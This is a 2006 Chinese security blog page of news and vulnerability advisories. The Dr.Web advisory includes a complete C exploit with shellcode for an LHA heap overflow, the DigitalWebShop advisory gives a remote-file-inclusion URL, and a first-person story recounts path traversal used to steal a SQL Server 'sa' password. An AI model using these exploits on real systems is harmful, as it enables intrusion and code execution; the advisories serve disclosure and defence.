  据美国Techweb网站报道,Windows系统的安全中心主要是用来显示用户是否已安装了防火墙或杀毒软件等相关信息。例如,提示用户所安装的杀毒软件的病毒库是否为最新。

  但是,微软却不允许第三方软件开发商禁用Vista的安全中心功能。对此,赛门铁克称,这将使用户的选择权受到限制。而且,由于赛门铁克、迈克菲和趋势科技等安全软件已经内置了安全中心,同时出现多个安全中心容易使用户混淆。

  此前,赛门铁克在Vista的防火墙方面也与微软存在分歧。后来,微软同意在安装第三方防火强后,可以禁用Vista的内置防火墙。赛门铁克还表示,将来还有望在关闭Windows Defender上与微软达成一致。

  在当前的Windows XP系统下,第三方安全厂商可以关闭微软的安全中心,以便让用户使用自己的安全中心提供功能。赛门铁克发言人Chris Paden称“这并不是巧合,很明显,微软是想利用其垄断地位来发展自己的安全产品。
类别: 无分类 |  评论(0) |  浏览(26367) |  收藏
2006年09月27日 20:45:40

Sun Secure Global Desktop多个输入访问验证漏洞

受影响系统:
Sun Secure Global Desktop < 4.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 20135
CVE(CAN) ID: CVE-2006-1577

Sun Secure Global Desktop允许从各种客户端平台和设备安全的访问基于服务器应用。

Sun Secure Global Desktop的一些脚本没有得到任何认证过程的保护,允许通过跨站脚本攻击执行任意代码或泄漏有关目标主机的主机名、软件版本、配置细节敏感信息。

<*来源:Marc Ruef (marc.ruef@computec.ch

链接:http://marc.theaimsgroup.com/?l=bugtraq&m=115885284727501&w=2
*>

建议:
--------------------------------------------------------------------------------
临时解决方法:

* 禁用以下脚本:

- ttaarchives.cgi
- ttaAuthentication.jsp
- ttalicense.cgi
- ttawlogin.cgi
- ttawebtop.cgi
- ttaabout.cgi
- test-cgi

厂商补丁:

Sun
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://sunsolve.sun.com/security
类别: 无分类 |  评论(0) |  浏览(9278) |  收藏
2006年09月27日 20:44:44

Dr.Web Anti-Virus畸形LHA文档堆溢出漏洞

受影响系统:
Dr.Web Dr.Web Anti-Virus 4.33
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 20119
CVE(CAN) ID: CVE-2006-4438

Dr.Web Antivirus中文名为俄罗斯毒霸,是一款俄罗斯出品的功能强大的杀毒防毒工具。

Dr.Web Antivirus在处理扩展目录头中带有超长目录名的畸形LHA文档时存在堆溢出漏洞,攻击者可以利用这个漏洞覆盖一些内部malloc管理信息,导致拒绝服务或执行任意指令。

<*来源:Jean-Sébastien Guay-Leroux (jean-sebastien@guay-leroux.com

链接:http://secunia.com/advisories/22019/
http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/049552.html
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

// Base structure of a LHA file
#define I_HEADER_SIZE 0
#define I_HEADER_CHECKSUM 1
#define I_METHOD 2
#define I_PACKED_SIZE 7
#define I_ORIGINAL_SIZE 11
#define I_LAST_MODIFIED_STAMP 15
#define I_ATTRIBUTE 19
#define I_HEADER_LEVEL 20
#define I_NAME_LENGTH 21
#define I_NAME 22
#define I_CRC 26
#define I_EXTEND_TYPE 28

// Extended structure of a LHA file
#define E_HEADER_SIZE 0
#define E_HEADER_TYPE 2
#define E_HEADER_NAME 3

#define DEBUG 0

unsigned char shellcode1[] =
"\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08"
"\x11\x22\xdf\x83\xeb\xfc\xe2\xf4\x62\x1a\x7a\x46\x5a\x77\x4a\xf2"
"\x6b\x98\xc5\xb7\x27\x62\x4a\xdf\x60\x3e\x40\xb6\x66\x98\xc1\x8d"
"\xe0\x19\x22\xdf\x08\x3e\x40\xb6\x66\x3e\x51\xb7\x08\x46\x71\x56"
"\xe9\xdc\xa2\xdf";

FILE * open_file (char *filename) {

FILE *fp;

fp = fopen ( filename , "w" );

if (!fp) {
perror ("Cant open file");
exit (-1);
}

return fp;
}

void put_byte (char *ptr, unsigned char data) {
*ptr = data;
}

void put_word (char *ptr, unsigned short data) {
put_byte (ptr, data);
put_byte (ptr + 1, data >> 8);
}

void put_longword (char *ptr, unsigned long data) {
put_byte (ptr, data);
put_byte (ptr + 1, data >> 8);
put_byte (ptr + 2, data >> 16);
put_byte (ptr + 3, data >> 24);
}

void usage (char *progname) {

printf ("\nTo use:\n");
printf ("%s <retloc> <retaddr> <file>\n\n", progname);
printf ("Example: %s 0x08080114 0x081C63F8 LHA_dir\n\n",
progname);

exit (-1);
}

int main (int argc, char *argv[]) {

FILE *fp;
char *hdr = (char *) malloc (4096), *ptr;
int header_size;
int written_bytes;
int total_size;
unsigned int retloc, retaddr;
char *filename = (char *) malloc (256);
int i;

if (!hdr) {
perror ("Error allocating memory");
exit (-1);
}

if ( argc != 4) {
usage ( argv[0] );
}

// parse arguments
sscanf (argv[1], "0x%x", &retloc);
sscanf (argv[2], "0x%x", &retaddr);
strncpy (filename, argv[3], 255);

memset (hdr, 0, 4096);

// base header
header_size = 29;
put_byte (hdr + I_HEADER_SIZE, header_size);
put_byte (hdr + I_HEADER_CHECKSUM, 83);
memcpy (hdr + I_METHOD, "-lh0-", 5); // No compression...
put_longword (hdr + I_PACKED_SIZE, 0x1234);
put_longword (hdr + I_ORIGINAL_SIZE, 0x1234);
put_longword (hdr + I_LAST_MODIFIED_STAMP, 0x1234);
put_byte (hdr + I_ATTRIBUTE, 0x20);
put_byte (hdr + I_HEADER_LEVEL, 0x01);
put_byte (hdr + I_NAME_LENGTH, 0x04);
put_longword (hdr + I_NAME, 0x90909090);
put_word (hdr + I_CRC, 0x6666);
put_byte (hdr + I_EXTEND_TYPE, 0x55); // Unix filesystem.

// extended header
put_word (hdr + header_size + E_HEADER_SIZE, 285);
put_byte (hdr + header_size + E_HEADER_TYPE, 0x2);

// Build our payload
memset (hdr + header_size + E_HEADER_NAME, 0x41, 266);
for (i = 0, ptr = hdr + header_size + E_HEADER_NAME; i < (240
- strlen (shellcode1) - 10);) {
ptr[i++] = 0xeb;
ptr[i++] = 0x0a;
}
for (; i < (240 - strlen (shellcode1));) {
ptr[i++]=0x90;
}
memcpy (hdr + header_size + E_HEADER_NAME + 240 - strlen
(shellcode1), shellcode1, strlen(shellcode1));

put_longword (hdr + header_size + E_HEADER_NAME + 266,
0x41414141);
put_longword (hdr + header_size + E_HEADER_NAME + 270,
0xB7E34CC2);
put_longword (hdr + header_size + E_HEADER_NAME + 274, retloc
- 0xc);
put_longword (hdr + header_size + E_HEADER_NAME + 278,
retaddr);

// Size of next extended header is 0
put_word (hdr + header_size + E_HEADER_NAME + 282, 0x0000);

total_size = (header_size + 284 + E_HEADER_NAME);

fp = open_file (filename);

if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 )
{
if (DEBUG) printf ("%d bytes written\n",
written_bytes);
} else {
perror ("Cant write to the file\n");
}

fclose (fp);

return 0;
}

建议:
--------------------------------------------------------------------------------
临时解决方法:

* 修改drweb.ini,将CheckArchives行改为:

CheckArchives = No

厂商补丁:

Dr.Web
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.sald.com/
类别: 无分类 |  评论(0) |  浏览(7884) |  收藏
2006年09月27日 20:44:02

OSU HTTP Server多个信息泄露漏洞

受影响系统:
Dave Jones OSU 3.11alhpa
Dave Jones OSU 3.10a
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 20098

OSU是为Compaq/HP OpenVMS操作系统设计的HTTP服务器。

OSU在处理用户请求时存在多个漏洞,远程攻击者可能利用这些漏洞获取服务器的一些信息。

如果向OSU请求了并不存在的文件的话,就可能泄漏Web根目录的完整绝对路径。此外,如果提交了包含有通配符的特制URL的话,在处理这个请求时可能会泄漏目录的内容。

<*来源:Julio Cesar Fort (julio@rfdslabs.com.br
Iruata Souza (iru.muzgo@gmail.com

链接:http://secunia.com/advisories/22016/
http://lists.grok.org.uk/pipermail/full-disclosure/2006-September/049535.html
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

路径泄漏

http://www.example.com/NONEXISTANT

Error:
File /staff$disk/www_server/home/NONEXISTANT (/NONEXISTANT) could
not be opened VMS especification:
staff$disk:[www_server.home]NONEXISTANT index.url present

文件和目录泄漏

http://www.example.com/a*/

建议:
--------------------------------------------------------------------------------
厂商补丁:

Dave Jones
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ecr6.ohio-state.edu/www/doc/serverinfo.html
类别: 无分类 |  评论(0) |  浏览(8293) |  收藏
2006年09月27日 20:28:45

DigitalWebShop多个远程文件包含漏洞

受影响系统:
DigitalWebShop DigitalWebShop 1.128
DigitalWebShop DigitalWebShop 1.120
DigitalWebShop DigitalWebShop 1.110
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 20107

DigitalWebShop是一个内嵌的PHP脚本,可以使用图形相册和描述设计在线产品目录。

DigitalWebShop的rechnung.php和prepend.php文件没有正确地验证_PHPLIB[libdir]参数的输入,允许攻击者通过包含本地和外部资源的任意文件执行任意PHP代码。

漏洞代码如下:

....
require_once($_PHPLIB["libdir"] . "phpDB-mysql.lib"); /*
Mysql Class*/
require_once($_PHPLIB["libdir"] . "messages_inc.php"); /*
Layout f?r Echos & Prints. */
....

成功攻击要求打开了register_globals。

<*来源:ajann

链接:http://secunia.com/advisories/22026/
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://target.com/rechnung.php?_PHPLIB[libdir]=http://target.com/command.php?

建议:
--------------------------------------------------------------------------------
厂商补丁:

DigitalWebShop
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://digitalwebshop.dyndns.org/phpBB2/index.php
类别: 无分类 |  评论(0) |  浏览(8379) |  收藏
2006年09月27日 20:27:27

黑客入侵实例之轻装入侵个人主页空间

最近学习ASP,想申请一个免费空间。找到一个满意的一看,限制还真不少,不但最多只能放30MB的文件,单个上传文件还不能超过1.5MB,而且也不支持ASP。这怎么行呢?严重打击我学习的积极性。于是我就想能不能突破网站的限制。

  首先用X-Scan2.3扫描,不一会儿结果出来了,有用的信息有:“Windows 2000操作系统,139端口开放”、“80端口开放,Web服务器用的是IIS”、“1433端口开放,用的是MS SQL Server”、“3389远程管理端口在开启状态”。

  看来只有对Web下手了。观摩了一下这个PHP个人主页系统,不管了,先用简单的办法碰碰运气。用自己的账号和密码登录进去,(这是一个Web方式管理的个人主页系统,不支持FTP),在个人主页根目录下建立一个rich4文件夹,把自己曾玩过的save1.dat(游戏记录文件)传上去。这时我看到IE的地址栏变成了:“http://***.php?action=chdr&file=%2Frich4”,看到这个地址的奇怪之处没有,我把rich4文件名改成“/.”,地址栏就成了“http://***.php?action=chdr&file=%2F/.”。再接再厉,把“/..”改成“/../..”即“***.php?action=chdr&file=%2F/../..”居然看到了Recycled目录。看来进入硬盘根目录下了。这个硬盘有不少文件夹,有个人主页目录Free(这个目录下放着很多个人主页的文件夹),还有一个备份目录。有什么呢?进去看看,在admin子目录中有个global.asa文件,点击编辑,哈哈,果然看到账户了。后面的过程就不说了。

  后记:

  其实这个免费主页空间的管理员还是有一定安全意识的(Windows 2000系统安装在C盘,IIS安装在D盘,个人主页安装在F盘)。问题出在什么地方呢?

  1.个人主页采用PHP系统,但是没有过滤“/”、“.”等特殊符号,所以可以遍阅F盘下的任何文件;

  2.个人主页后台管理系统采用ASP系统,放在D盘下,但是居然在F盘里放了一个备份,让我阅读了global.asa文件,看到了MS SQL Server的“sa”账户密码;

  3.没有取消“sa”账号的远程连接,也没有删除xp_cmdshell,使得我可以执行cmd本地命令
类别: 无分类 |  评论(0) |  浏览(7785) |  收藏
2006年09月27日 20:26:06

互联网和信息安全面临严峻挑战

光明网-光明日报

  本报北京9月21日电(记者郭丽君)随着互联网向经济社会文化等各个领域的不断扩展,网络与信息安全问题日益成为社会各界普遍关注的热点问题。在今天召开的中国互联网大会上,信息产业部副部长蒋耀平表示,网络和信息安全问题已成为困扰互联网发展的关键问题。

  蒋耀平说,随着近年来互联网的迅速发展,网络犯罪、黑客与病毒攻击及不良信息传播等问题越来越突出。据统计,2002年到2005年,我国有关部门接到的网络安全事件报告,从1761件猛增到12.37万件,日均超过了338件,同时能够较好体现本民族优秀文化传统、具有较强吸引力的网上内容还比较欠缺,色情、暴力等各类不良信息仍然存在,严重影响未成年人的成长。国